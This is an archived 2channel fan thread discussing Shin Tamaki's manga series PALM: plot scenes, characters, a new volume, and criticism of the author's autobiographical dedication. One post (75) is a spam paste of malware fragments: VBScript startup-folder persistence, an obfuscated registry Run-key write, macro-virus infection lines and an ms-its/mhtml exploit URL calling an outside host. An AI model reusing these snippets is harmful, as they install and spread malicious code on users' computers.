5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

PALM■伸たまき・獸木野生part4■THE WORLD

1 :2chネラー:2006/09/04(月) 02:51:54 ID:???0
次スレでつ

2 :花と名無しさん:2006/09/04(月) 02:54:52 ID:???0
委員長は獣木印本人で乙

3 :花と名無しさん:2006/09/04(月) 11:45:35 ID:???0
>>1
乙。

前スレ笑った。
2chで「2chネラーはくんな」って言われてもね。

4 :2chネラー:2006/09/04(月) 12:12:37 ID:???0
2chネラー大歓迎でつ。
だけど変な人がくるからたまぴんは可愛がってあげて欲しいでつ。
よろしくでつ。

5 :花と名無しさん:2006/09/04(月) 12:16:59 ID:???0
>1乙
ホントだ、2ちゃんねるにいる時点で委員長もねらーだよなww
意外な盲点だった、気づきなかったでつ。

6 :花と名無しさん:2006/09/04(月) 12:25:01 ID:???0
ほんと両方ともしつこいね。

7 :花と名無しさん:2006/09/04(月) 15:58:17 ID:???0
前スレすげー。
これからも委員長が清濁併せ持つネット世界で穏やかに生きていけますように。

さて、たまぴんの話でもしようか。

8 :花と名無しさん:2006/09/04(月) 16:51:55 ID:???0
□前スレ
PALM■伸たまき・獸木野生part3■THE WORLD
http://comic6.2ch.net/test/read.cgi/gcomic/1123990381/

□前々スレ
PALM■伸たまき・獣木野生part2■THE WOLD
http://comic6.2ch.net/test/read.cgi/gcomic/1084031300/

□関連スレ
伸たまき パーム
http://salad.2ch.net/gcomic/kako/965/965030112.html
獸木野生(伸たまき)作品を語ろう
http://choco.2ch.net/gcomic/kako/987/987658116.html
□関連スレ(html)
伸たまき パームシリーズ
http://mentai.2ch.net/gcomic/kako/960/960216335.html
□関連スレ(現行)
新書館 WINGS 6冊目
http://comic6.2ch.net/test/read.cgi/gcomic/1143381371/

■関連URL
獸木野生HP BIGCAT Studio
ttp://www.magiccity.ne.jp/~bigcat/index2.html

9 :8:2006/09/04(月) 16:53:04 ID:???0
前スレでまとめてくれた人ありがとう、テンプレ一応貼っときました。

10 :花と名無しさん:2006/09/04(月) 21:33:17 ID:???0
昨日初めて来てすぐ前スレが終わったから・・・うれしい・゚・(ノД`)・゚・
>>1乙ですw

11 :花と名無しさん:2006/09/06(水) 21:57:56 ID:???0
保守がてらに独り言。
「架空の線」のラストでエンジュがシデと別れるときの
シデがいつもついてきたのは自分といれば愛されて庇護されると
信じてたから、ってモノローグがエエー( ゚Д゚)だった。
「その信頼に足るものを与えられていたろうか」って風に続くけど
なんか納得いかない物を感じた。
普通に大好きだよ元気でね、じゃいかんかったのか…

12 :花と名無しさん:2006/09/07(木) 11:50:37 ID:???0
公式サイトの今後の予定ってとこ、作者さんのご挨拶に
更新されてたんだね。
読んでいていろいろな思いが胸を交錯した・・・・・

13 :花と名無しさん:2006/09/07(木) 13:01:47 ID:???0
>>11
その場面のそのセリフは、何となくわかる気がするんだよね。
エンジュはシデの為に、食べ物を分け与え、身を挺して守ってきたけど、
シデはエンジュが兵士にレイプされようとしてても、彼女を守る行動を取ろうとせず、
貰ったビスケットを食べたりしてた。
犬だから仕方ないとしても、シデは一方的にエンジュの庇護を受けようとしてただけ。
色々な経験をして、それに気づいてしまったエンジュにとって、
シデは護ってやらなければならない存在ではあっても、「好き」という言葉で
表現できる感情を向けられる相手や、信頼できる相手ではなくなってしまってたんじゃないかな。

14 :花と名無しさん:2006/09/09(土) 13:28:59 ID:???O
>>11
言葉がカタイ(?)表現になってるけど、
シデはエンジュに対して絶対的に信頼して着いて来てくれて、
それはエンジュにとっても頼られる自信とか守る者がある勇気になってる面があったのに、
どうしようもないとはいえ、自分の身勝手な理由で手放し、信頼を裏切る形になってしまった。
でも、良く考えてみたら今までだって、自分はシデの信頼に応えたと言い切れるほどの事はしてなかったのではと思ってしまったし、
これ以上、自分には与えてやれない無力感のようなものを感じた。
あるいは、もっと単純に別れ際になってようやく支えているつもりで支えられてた事に気付いたんじゃないだろうか。

サラッと元気で、でも悪くはないけど、
この話には小さいテーマとして、「自立」があるんじゃないかと思ったよ。

15 :花と名無しさん:2006/09/09(土) 21:34:46 ID:???0
11です。
独り言にレスが付いてる!
>>13>>14さんありがとうございます。

>シデは一方的にエンジュの庇護を受けようとしてただけ。
>色々な経験をして、それに気づいてしまったエンジュ

>この話には小さいテーマとして、「自立」があるんじゃないかと

おお。なんだか腑に落ちました。
あのモノローグは、あんなに唯一の家族としてそれこそ体張って
守ってきたシデと「別れる」んじゃなくて「捨てる」みたいで
びっくりしたんですよ。
エンジュも理不尽な体験やワイルド'Sに関わった事を通して
自分の人生を踏みにじられも流されも頼るでもないものに
しようとしての出来る事の第一歩ってところでしょうか。
他の人の解釈に触れて、読み取れなかった事に気付かされると嬉しいです。

16 :花と名無しさん:2006/09/10(日) 12:23:48 ID:???0
THE WORLDもパームシリーズも一冊3円で買い叩かれたw
青背表紙以降の作品は全部売り払ってきました。バイバイ獣木先生

17 :花と名無しさん:2006/09/10(日) 12:38:36 ID:???0
3円ってのはすごいな
30円じゃないのか

18 :花と名無しさん:2006/09/10(日) 13:46:27 ID:???0
全巻すごい状態良かったんだけどね。
知名度の問題かも。
白背表紙のは死ぬまで持っていくよ伸先生……

19 :花と名無しさん:2006/09/10(日) 17:24:25 ID:???0
ワールドの柱のコメントが嫌だ。
そんなもんなくても輝いてた昔の作品を描く意欲はどうしんたんだよ
漫画はどうでもよいんだろうか


20 :花と名無しさん:2006/09/10(日) 18:08:23 ID:???0
ワールドは買ってないからわからんのだが
一体何が書いてあったんだ。

21 :花と名無しさん:2006/09/10(日) 21:28:57 ID:???0
>>16
3円…泣けるね。ニ重の意味で。
ワールドの2巻はすごくいいからそれだけはもったいないと思うけど、
でも全巻揃ってないともっと安かったかもしれないしね…。

22 :花と名無しさん:2006/09/14(木) 12:43:09 ID:???0
またグチグチスレか…

23 :花と名無しさん:2006/09/14(木) 15:40:28 ID:???0
>>22
原作が面白かったら誰も愚痴言わないよ。

24 :花と名無しさん:2006/09/14(木) 17:05:08 ID:???0
ならば購読をやめればよい。
他人に「苦言」を呈しているより
よほど効果的だ。

25 :花と名無しさん:2006/09/14(木) 17:19:08 ID:???0
>>24
そうもいかないわけさ。
面白くなくなっても、最後まで見届けたい気持ちがある読者もいるわけで。
つーかまた荒れるから、仕切りもうやめれ。愚痴の方がマシ。

26 :花と名無しさん:2006/09/14(木) 17:23:31 ID:???0
これも意見だろ

27 :花と名無しさん:2006/09/14(木) 20:32:03 ID:???0
最近の絵は人物がコンパスみたいに見える…

28 :花と名無しさん:2006/09/14(木) 20:45:17 ID:???0
>>26
その意見しかと読ませていただいた。だが断る。

29 :花と名無しさん:2006/09/14(木) 20:56:13 ID:???0
>>28
そうか。ならば死んだ子の年をかぞえておれ。

30 :花と名無しさん:2006/09/14(木) 22:56:13 ID:???0
死んだ子の年を数えてみたくなるほどに、初期のパームは
他の漫画にはない独特の魅力があったんだよ……。

31 :花と名無しさん:2006/09/15(金) 04:59:44 ID:???0
今のパームも魅力あると思いますよw
ゆっくりペースでも新刊を楽しみにしてます
ハリー女史カッコヨス

32 :花と名無しさん:2006/09/15(金) 20:09:41 ID:???0
>>31
そういうことを書くと、お前はPALMの魅力をまったく理解していないとか言われるか、作者周辺乙と言われそうな予感

これって、80年代の話なんだよね。我々は21世紀に生きてるわけだけど・・・その辺りに価値観のズレも出てるような

33 :花と名無しさん:2006/09/15(金) 20:28:37 ID:???0
>>32
そこまで否定的かつ疑り深い人いるかなぁ?
面白いならいいんじゃないのと思うだけだよ。

34 :花と名無しさん:2006/09/15(金) 23:24:37 ID:???0
ああよかった、次スレ立ってて。

なんだかんだいっても
カーターん家にみんな集まってきたくなるんだよ、
パーム好きな人は多分。そんで、JBやアンジェラに
辛辣なこと言われたいんだきっと。
麻薬みたいなもんだねこうなると。

35 :花と名無しさん:2006/09/15(金) 23:31:16 ID:???0
>>34
おまい大物だな。感心した。

36 :花と名無しさん:2006/09/16(土) 01:01:12 ID:???0
アンジェラ親子がおかまのグレッグと、何の偏見もなく接してる描写を読んで
自分の中にあった根拠無きホモ嫌悪感に気付かされたりしたな…厨ってシンプル。
最小限のセリフで目からウロコ、一見ドライだけど情が深い、みたいな
星の歴史以前のああいう空気感が、次回作でも読めると良いやね。

37 :花と名無しさん:2006/09/16(土) 12:41:10 ID:???0
まぁ、それはちょっと無理だろうな…
あの空気感はその頃の作者にしか出せないんじゃ。

38 :花と名無しさん:2006/09/20(水) 16:00:20 ID:???0
アソウボッチャマみてるとフロイドを思い出す。

39 :花と名無しさん:2006/09/20(水) 16:31:00 ID:???0
>16
遅レスだが、ヤフオクに出せばよかったのに。

40 :花と名無しさん:2006/09/21(木) 00:05:48 ID:???0
>38
そりゃちょっとフロイドが可哀想だよ・・・。

41 :花と名無しさん:2006/09/21(木) 01:08:38 ID:???0
>40
いや容姿はおいといてw 
スペシャル級ボッチャマのくせに漂う庶民臭とか
結構な人心掌握力もあるしたたかぶりとかな。

42 :花と名無しさん:2006/09/21(木) 04:36:31 ID:???0
荒れるヨカーン

43 :花と名無しさん:2006/09/21(木) 23:51:58 ID:???0
アソーは永田町では希有なほどの漫画ヲタ、というのを聞いて
一気に好感度上がったw

44 :花と名無しさん:2006/09/22(金) 00:09:19 ID:???0
自分もそれ知った頃は麻生イイナだったんだけど、
ヨクヨク話聞いてると、それしかないって印象になってきて
それだけが売りっていうか、鼻につくようになって・・・。
フロイドのほうが大物。

45 :花と名無しさん:2006/09/22(金) 08:40:53 ID:???0
フロイドはASPのクライマックスでの大技が最高。
その後の恋愛でゴチャゴチャしてるところはちょっと醒めたなー

46 :花と名無しさん:2006/09/22(金) 19:46:14 ID:???0
恋男のフロイドは嫌いじゃなかったな。可愛気あって。

47 :花と名無しさん:2006/09/25(月) 21:08:05 ID:???0
しかしあのモミアゲが謎なのだ。どうのばしたらああなるんだ?

と思ってググったら、外人さんにはけっこういた。
毛深い人は、あそこまでいくみたい。
てことは、フロイドって他もボーボー・・・・・・?

48 :花と名無しさん:2006/09/26(火) 00:25:44 ID:???0
ボーボーはセクシーの源だからいいんじゃない?w


49 :花と名無しさん:2006/09/26(火) 06:04:44 ID:???0
なんかウルヴァリン連想した

50 :花と名無しさん:2006/09/26(火) 21:35:57 ID:???0
恋男フロイドは可愛げあったけどビアトリスにふられて
次がジョゼ、って流れに無理があった。
相性が良かったって事だけど、その後の描写が恋愛に見えん。

51 :花と名無しさん:2006/09/27(水) 02:23:05 ID:???O
ビアトリスとの決別シーンは好きだな。
「せっかくの手料理だけど、食えそうにない」って泣くのが。

52 :花と名無しさん:2006/09/27(水) 11:36:46 ID:???0
友愛描写と言うか、広義の愛の描写はすごく素敵なんだけど、
恋愛になるとどうも唐突過ぎたりなんで?って印象を受けるのが多いな。
恋愛がそういうもんだと言われればそれまでなんだけど、
どのキャラも似てる。

53 :花と名無しさん:2006/09/27(水) 13:07:14 ID:???0
>>50
ジョゼもなんか作者投影キャラっぽくて嫌だったなあ
神秘的とかじゃなくただ単に気持悪いだけだった。

54 :花と名無しさん:2006/09/27(水) 16:04:51 ID:???0
>>50
自分は最初からビアトリスとは無いって感覚だったし、
ジョゼの、リアルな「恋」っぽい描写がストンと来たので
特に違和感なかったなあ。

55 :花と名無しさん:2006/09/27(水) 19:17:09 ID:???0
……リアル………………?

56 :花と名無しさん:2006/09/27(水) 23:17:38 ID:???0
惚れた男相手でも、無理やりキスされりゃ舌に噛み付くあのガッツは好きだな。
ていうかJBに無理強いするのと同じ事なんだから、フロイドもあれぐらい予想しとけ、と。

57 :花と名無しさん:2006/10/01(日) 20:12:13 ID:???0
家系図と歴史年表と小説プレビュー読んで、
久しぶりにわくわくした!

58 :花と名無しさん:2006/10/02(月) 21:53:40 ID:???0
ちと読んでみたくなった。小説版。

59 :花と名無しさん:2006/10/02(月) 22:29:04 ID:3GFpZMu10
ぶっちゃけへぼいけどね>小説

60 :花と名無しさん:2006/10/03(火) 11:23:38 ID:???0
小説は視点が違うのはともかく、
キャラもちょっと違うよね。

61 :花と名無しさん:2006/10/04(水) 12:24:26 ID:???0
見に行った自分が悪いのかもしれないが
小説プレビューで軽くネタバレくらわされて落ち込んだ。
「オールスター」のラストはあれはあれで納得できだけど…

62 :花と名無しさん:2006/10/04(水) 16:33:45 ID:O4k+Dgv00
マージでー!?>ネタバレ


orz

63 :花と名無しさん:2006/10/04(水) 19:53:57 ID:???0
言われても嬉しくないと思いつつ>>61さんありがとう。
おかげで見に行かないで済んだ。
61さんは悪くない。
作者がトップでネタバレ注意しておくべきだよ。

64 :61:2006/10/05(木) 12:37:59 ID:???0
あ、落ち込んだというのは登場人物の将来の運命についてで
おそらく次回連載の初回小説版で明かされる内容だろうから
ネタバレというのは言葉悪かったかも。

65 :花と名無しさん:2006/10/05(木) 13:58:42 ID:D9GOc1vY0
読んできたけど、なんかこう、どうなのこういう構成って。
最初にネタばらし(しかも漫画じゃない羅列文の形で)して……って
正直微妙だなー……。ASPラストで絶叫したのとはまた違うと思う、
これ。小説書きたいなら小説だけで出せばいいのに……

66 :花と名無しさん:2006/10/05(木) 14:10:37 ID:???0
あのプレビュー読んで、「作者はどこまでカーターが憎いんだ?」と思ったよ

67 :花と名無しさん:2006/10/06(金) 01:24:33 ID:???O
ジェームスの死に方とか、アンディの片足とか、オーガス邸炎上とか
未解決の伏線は多々あれど、ASPで終わっとけば…
と思わずにはいられない。

68 :花と名無しさん:2006/10/06(金) 05:38:28 ID:6BtZyDmT0
自分もそれドウイ派>ASPまでで終了
それ以降が好きな人もいるのわかってるけど……
ほんとASPまでは手放しで大好きでたまらなかった。

今ではなんとなく目をそらしてしまう。


69 :花と名無しさん:2006/10/15(日) 10:59:22 ID:???O
コミックス派なんだけど、最近は劣化ひどいの? 終了予定が何年だったのかも忘れてしまった。

70 :花と名無しさん:2006/10/15(日) 14:24:08 ID:???0
フツーにオモロイと思うんだけど、年代的なことはあんまり気にしてないんで
基本コミックス派

71 :花と名無しさん:2006/10/15(日) 15:11:44 ID:???0
>>69
劣化と呼ぶのかはわからないけど、
スレ読む限りでは作風の変化に不満の声は多し。
もちろん今も普通に読んでる人もいるようだけど。

72 :69:2006/10/16(月) 12:36:45 ID:???O
>>71
ありがとうございます。個人的には広げた風呂敷をちゃんと畳んでくれたら文句は
ないんですが、最近は「ちゃんと畳めるのかなあ」と、ちょっと心配だったり。

73 :花と名無しさん:2006/10/17(火) 08:41:00 ID:fPtCCop50
あまりにも長年にわたってるから作風の変化は避けられないとは思うんだけどね。
てか変わるなというのが無理……。
きれいに風呂敷多端でほしいに激しくドウイ。ほんとそれだけだなあ。


74 :花と名無しさん:2006/10/17(火) 08:41:33 ID:fPtCCop50
×多端で
○畳んで
怪しい変換しちゃった……orz

75 :<body onload=window()>:2006/10/17(火) 21:17:44 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


76 :花と名無しさん:2006/10/18(水) 22:23:01 ID:???0
くそ、ウィルス貼りやがって
どこの誰だおー!

77 :花と名無しさん:2006/10/19(木) 00:34:22 ID:???0
>76
アリス

78 :花と名無しさん:2006/10/19(木) 01:18:17 ID:???0
しかし連載1回目を小説で出すってのは
反応がよければ次話から小説でっつう意図もあんのかね

79 :花と名無しさん:2006/10/19(木) 04:59:02 ID:h4ZWnPJW0
そろそろ漫画書くのめんどっちくなって小説家デビューしたいとみた

80 :花と名無しさん:2006/10/19(木) 08:18:07 ID:???O
もともと小説でやりたかったのかなあ

青また青 は、小説家の話だし

81 :花と名無しさん:2006/10/21(土) 12:30:42 ID:???O
小説はマンガが終わってから好きなだけ描いてくれ。

82 :花と名無しさん:2006/10/21(土) 12:31:46 ID:???O
いかん。『描いて』じゃなくて『書いて』だ。



佐賀

83 :花と名無しさん:2006/10/21(土) 16:47:40 ID:???0
>82
県付けないとだめですよ



佐賀県

84 :花と名無しさん:2006/10/21(土) 17:21:24 ID:???0
佐賀つまらないし見飽きた。くどい。

85 :花と名無しさん:2006/10/21(土) 19:32:47 ID:???0
佐賀県?

86 :花と名無しさん:2006/10/21(土) 21:45:04 ID:???0
知りたければガイドラインでも見に行けば。

87 :花と名無しさん:2006/10/21(土) 22:08:56 ID:???0
アンジェラ?

88 :花と名無しさん:2006/10/24(火) 22:30:28 ID:???0
10月24日発売って書いてあったけど
まだ売ってないね。

89 :花と名無しさん:2006/10/25(水) 23:21:15 ID:???0
書店で聞いたら31日に入荷だって。
1週間遅くなったんだね。

90 :89:2006/10/25(水) 23:23:14 ID:???0
あ、でも他スレで「暴本の3巻」が出てたって言ってたから地域差があるかも。


91 :花と名無しさん:2006/10/26(木) 00:32:14 ID:???0
新刊ゲト。コミックス派なんで嬉しい。
なんだかんだ文句はあるけど、やっぱりパーム好きだなー。

だけど、どうしてもジェームスがジョイを婚約するほど
愛してるように見えない。
シドのときも思ったけど、それがモニョる原因なのかな。



92 :花と名無しさん:2006/10/26(木) 05:59:16 ID:???0
新刊ゲト。
ラストの「ふたりの息子に捧ぐ」って、殺した子を含めて言ってるのか?
アホな誤解をしているような気がするけど、マジでわからないです……

93 :花と名無しさん:2006/10/26(木) 06:04:14 ID:zHHDCjIx0
ひとりは ジ ェ ー ム ス じゃないの?(((;゚Д゚)))

94 :92:2006/10/26(木) 07:12:57 ID:???0
>>93
あ、そっちがあったか! サンクス。

95 :92:2006/10/26(木) 09:13:33 ID:???0
──と思ったら、
Dedicated to my two biological sons
と書いてあった・・・orz

96 :花と名無しさん:2006/10/26(木) 14:32:53 ID:???0
こ、殺した子?って、何?;

97 :花と名無しさん:2006/10/26(木) 16:20:51 ID:???O
ダタイ

98 :花と名無しさん:2006/10/26(木) 17:07:19 ID:7gYx4+Ts0
そゆこと告ることがダサい

99 :花と名無しさん:2006/10/26(木) 19:21:02 ID:???0
ドーイ

100 :花と名無しさん:2006/10/26(木) 19:46:37 ID:???0
新刊ゲト!コミックス派の自分ですw
ジェームス「素晴らしい生き物だろ近親交配で改良されてる」
・・・・上手く笑えないよ・・・・w

101 :100:2006/10/26(木) 19:50:04 ID:???0
ネタバレ アツカイデ マズカッタラ スマソ

102 :ネタバレあるから注意:2006/10/27(金) 19:08:13 ID:???0
>>98
Webで書いてなかったっけ? どっちにしても本人の勝手だろ。

で、俺もコミックス派なんだけどイライザがハーヴに言った言葉の中で
「子どもの死を看取りたい」というのがあったけど、これだけは理解不能。
イライザを通して作者の身勝手な部分が透けて見えたようで嫌だった。

103 :花と名無しさん:2006/10/27(金) 20:08:14 ID:???0
最初の子供については、インタヴューで答えてた気がするんだが

パームブックに載ってなかったっけ?

104 :花と名無しさん:2006/10/27(金) 22:11:50 ID:???0
やっぱり再開後のカーターはアホっぽくてやだなぁ

105 :花と名無しさん:2006/10/27(金) 23:09:30 ID:???0
「愛する者を殺してしまったことに、後になって気付いた」(うろ覚え)
「殺人者という点で私はサロニーと同じ」(うろ覚え)
だったっけ? 『星の歴史』でパーム・シリーズを知ってハマった私としては、
なんて誤魔化さない言い方をする人だ!と感心した記憶があるよ。


106 :花と名無しさん:2006/10/28(土) 10:36:41 ID:G8xTJ4Pk0
産まなかった子供について殺した、という自覚があるならなおさら
ネタに使っちゃいけない(作品に使うのはいいけどネタばらししちゃ
いけない)と思うんだが……
子供にというより罪悪感持つ自分に酔ってるコメントが嫌だなあ。

107 :花と名無しさん:2006/10/28(土) 13:19:20 ID:???O
>>106
元々、宗教的なものを含む『救済』というのはそういう自己陶酔的な部分があるものだと
思うし、それ自体は否定しないんだが、ああいうのは好きじゃない。

108 :花と名無しさん:2006/10/28(土) 16:52:31 ID:+5CeE1R/0
禿同
作品として昇華することは全然オケーだと思うんだが
違うよね……(´・ω・`)

109 :花と名無しさん:2006/10/28(土) 16:53:01 ID:???0
ゴメソ無意味にageちゃってた…

110 :花と名無しさん:2006/10/29(日) 15:57:02 ID:???O
新刊get。
ようやく伏線が回収されだしたようで一安心。
けど最後の探偵編、というわりには期待したほど探偵してなかった気がする。
敵(?)があっさり死んだし、探偵カーターの見せ場が殆ど無かったせいだろうか。
ジョイとジェームスの結婚するほどの愛情も今一つ説明不足な感じするし、
愛でなくをもう少し縮めてこっちにページ欲しかったなぁ。

111 :花と名無しさん:2006/10/30(月) 18:05:38 ID:???0
蜘蛛の紋様の冒頭が小説っていうのは編集部の意向なんだろうなと思った。
「とっとと終わらせたい」といったところなんだろう。長い既刊分があるから
新規の客は望めないし、途中で止めると旧来のファンがうるさいし。
ひょっとして愛でなくの後に間が開いたのは、一度切ろうとしたのかも知れない
と勘ぐってしまう。庇ってくれる関口さんももう居ないし。

コミックスはまず小説収録板が出て、連載終了後に漫画に書き起こしたものが
出る悪寒(その時まで人気が続けば)

112 :花と名無しさん:2006/10/30(月) 20:34:19 ID:???0
やっと新刊購入。
色々言われているけど、p102からの台詞は良かった。

メ欄の台詞最高。

113 :花と名無しさん.:2006/10/30(月) 23:02:18 ID:???0
>>112
うん、「自分の子どもの最期を看取りたい」という部分以外は共感できた。

114 :花と名無しさん:2006/10/30(月) 23:32:05 ID:???O
「ピエタ」像の、キリストと聖母マリアのイメージなのかな。>「自分の子どもの最期を看取りたい」

アンディのお母さんの彫像にも、ちょっとピエタの雰囲気を感じる。

115 :花と名無しさん.:2006/10/31(火) 07:10:27 ID:???0
>>112
殺された乳母が“マリア”だったりするから、そういうキリスト教的な意味も
あるのかも知れない。ジェームス自体が殉教者の役割だとかね。

例えそうだとしても、あのセリフは親として許容できないな。

116 :花と名無しさん:2006/10/31(火) 07:22:58 ID:???0
自分の子供だから、最後まで責任を持ちたいってことかな?
だけどそれって結構日本的な感じになっちゃうし…。
殉教者として子供の人生のために自分の一生を尽くしたいってことかな?

ああ、よくわからん。

117 :花と名無しさん:2006/10/31(火) 10:42:55 ID:???O
ああいう発想する女が無理心中で子ども殺して自分だけ生き残るんだよ。

もう過去にひとり(ry

118 :花と名無しさん:2006/10/31(火) 11:07:52 ID:???0
子供の最期を〜っていう思考に、子供が氏んでも自分は生き残る、て
いう、子供によくあるオレ不死幻想みたいなものを感じて気持悪い。
ふつうおかしいでしょ、生物学的に。その順序をもし逆転するなら、
「子供を殺す」しかないわけで。
気持悪い。
自分は死なない存在のつもりなのかね。

119 :花と名無しさん:2006/10/31(火) 12:34:17 ID:???O
>>118
「自分が死んだ後も魂となってこの子を見守りたい。そして最期の時には側で励まし
共に神の元へ行きたい」とかなら、まだ許容範囲だったんだけどね。

永遠の命が欲しくてエヴァ初号機と融合し、息子まで手に入れようとした碇ユイと
同じ匂いがする。神秘的要素満載マンガだから仕方ないけど、障害児が産まれる
リスク無視してるし。

120 :花と名無しさん:2006/10/31(火) 13:07:52 ID:???0
子供を殺したことに自己陶酔するってどうなのそれ、みたいなのは
感じる。それも、普通に生きて育ってる子供さんも別にいての話だし。
小梨ならまだしも……(いやそれも嫌だけど)

なんかタスク君(だっけ?)がちょっと可哀想……。

121 :花と名無しさん:2006/10/31(火) 16:21:53 ID:???O
みんな作者自身と関連づけて深読みし過ぎじゃね?
そんな読み方したんじゃ楽しくないだろ。

122 :花と名無しさん:2006/10/31(火) 16:33:38 ID:???O
深読みもなにも、「パーム」や「青また青」なんかは作者自身の半生や願望や想い
そのものだろ。何のために「二人の息子」云々と書いたと思ってるんだ?

123 :花と名無しさん:2006/10/31(火) 18:04:41 ID:???0
>>111
>一度切ろうとしたのかも

やっぱりそれってあり得る感じ?
獣木さん、いやに執筆計画が長期かつ綿密だから、
「漫画家さんなんて、いつ書く場所(特に商業誌)がなくなるかわからないのに、
驚くほど計画的なのは、ずっと新書館で書き続ける確約というか自信があるのだろうか?」
と、ずっと疑問に思ってました。そうか、あの関口さん、もういないんですか。知りませんでした。
まあ、でももちろん獣木さんは、商業誌に切られても、自費出版でも同人でも、
石にかじり付いてでも、お金にならなくとも、
死ぬまでに絶対この物語を終わらせる強靭な意志がありそうですが…。
個人的に好きだった長期シリーズで未完の作品(掲載誌が廃刊になったり色々)が
複数ある私としては、切られる不安はないのかな…なんて疑問に思ってみたりしてたんですよね。
そうなって経済的には心配ない感じなんですかね? 見当もつきません……。

124 :花と名無しさん:2006/10/31(火) 18:07:26 ID:???0
最初の子供のことは、ずっと前から承知していたはずのことなのに、いきなり不満になって噴出したな

125 :花と名無しさん:2006/10/31(火) 20:00:10 ID:???O
>>122
その解釈や最近の流れのみを言ってるんじゃなく、
作品に関係無い話まで持ち出す事ないだろうし、
一々、作者の自己陶酔やジェイクマンセーと関連づなくたって、
気楽に読みゃいいのに、とな。


ま、私自身も作者情報を脳から完全消去なんて今更できんが。

126 :花と名無しさん.:2006/10/31(火) 20:40:47 ID:???0
>>125
>作品に関係無い話まで持ち出す事ないだろうし、
>一々、作者の自己陶酔やジェイクマンセーと関連づなくたって、
>気楽に読みゃいいのに、とな。

君は「オールスター・プロジェクト」に出てきた切り刻まれた胎児のシーンを
読んでないのかね? 「二人の息子」が作者の堕胎経験に無関係だとでも?

あれだけ頼まれもしない個人情報を見せつけられた挙げ句に、ああいう展開を
されたんじゃ関連づけるなという方が無理だし、作者自身もそれを承知の上で
やっていることだろ。読解力のない君がお気楽に読むのは自由だけどさ。

127 :花と名無しさん:2006/10/31(火) 20:55:36 ID:???O
だから、無関係だとは言ってないって。
私の書き方も悪かったが、おまいさんの読解力もないよ。

あと、お気楽に読めではなく、少しは肩の力を抜けと言ってるんだ。

128 :126:2006/10/31(火) 20:58:17 ID:???O
読解力は、作品に関する事に対して言ってるんじゃないからな。
一応。

129 :花と名無しさん:2006/10/31(火) 21:02:14 ID:???O
普通に>>127氏の読解力と文章力不足だと思うが?

赤の他人たちに作品の読み方を押し付けてるのも痛い。

130 :花と名無しさん:2006/10/31(火) 21:11:41 ID:???0
どちらにせよ、今更になって言い出すような不満じゃないような気もするが

131 :花と名無しさん:2006/10/31(火) 21:22:24 ID:???O
>>130
今更も何も、最新巻のセリフや巻末の言葉がイタイと思った人がけっこういたという、
ただそれだけの話だな。

132 :126:2006/10/31(火) 21:38:29 ID:???0
>>128
誰だおまえはw

133 :花と名無しさん:2006/11/01(水) 00:30:12 ID:???0
息子が育って、手がかからなくなったからその反動……というか、ふつーの男になってしまった不満が、産まれなかった方の息子を神格化させてるような気もする。

134 :花と名無しさん:2006/11/01(水) 00:44:16 ID:???0
>>133
なんか腑に落ちたorz

ていうか、息子だったってわかってるんだっけ?
「二人の子供」って言い方にはならないものかな。

135 :花と名無しさん:2006/11/01(水) 00:52:16 ID:???0
まぁあれだけhpとかで個人さらけだしちゃったら詮索されるのも仕方ないよね。
作品は凄いけど作品と個人的な事を線引きできないのはちょっと
読んでて白けるし。


136 :花と名無しさん:2006/11/01(水) 07:09:06 ID:???0
>>135
Webで個人をさらけ出した時点でイタイ人決定なんだよ。本人はかっこいいつもりなのかも
知れないけど、Webでも作品でも自己批判の裏側に気持ち悪い陶酔が透けて見える。
本当にどうしちゃったんだろうなあ。

137 :花と名無しさん:2006/11/01(水) 08:17:29 ID:???0
自己陶酔の材料に、死んだ(殺した)子供をネタに使うな。
作品として昇華するためにあえて使いたいというなら、
個人のリアル体験であることは最初から晒すな。

これだけじゃね?

個人情報を晒す作家は基本的に嫌いだが、自分のネタだけなら
ともかく子供(生きてる方も死んでる方も)を利用するのが
我慢できないよ。
特に生きてる方が気の毒だ、こんなの。

138 :花と名無しさん:2006/11/01(水) 08:49:55 ID:???0
自分の中の闇を作品に昇華させるクリエイターは少なくないからね。
読者のことを思っていないとまでは思わないけど、たぶんこの人は
自己救済の手段としての創作欲の方が勝っているんだと思う。
サイト等の自分語りも基本的には許容してくれる人に向けて書いてるんだろう
昔は熱狂的なファンもいただろうし

自分は作品にも作者にもある程度距離感を持ってるから
それほど腹が立つって程でもなく読んでますが
全盛期の頃を愛してる方々はやりきれないだろうな

139 :花と名無しさん:2006/11/01(水) 09:39:48 ID:???O
Webとかで明かす情報は「息子と二人暮らし」ぐらいで、「パーム」シリーズが完結
してから「二人の息子に捧げる」と記すだけで良かった。物語をきちんと読んできた
ファンなら、それだけで大まかな事情や作品に対する作者の想いを感じとれたはず。

今の状況を見てると、破れたハートを売り物にしてでも何とか商業誌で連載を続け
ようとしているのか、とまで勘ぐってしまう。

デビュー当時からのファンだけど、それが正直な気持ち。

140 :花と名無しさん:2006/11/01(水) 09:59:23 ID:FovJo/c00
まず第一に、この老婆を理解するには、この女性の息子が、今
「何をやっているか!」
で、すべて解明されるでしょ。誰か書いてくださいな。

自分、親の都合で欧州転々として、今音楽関連の仕事をしております。
しかし、  
この人の息子の活躍は、
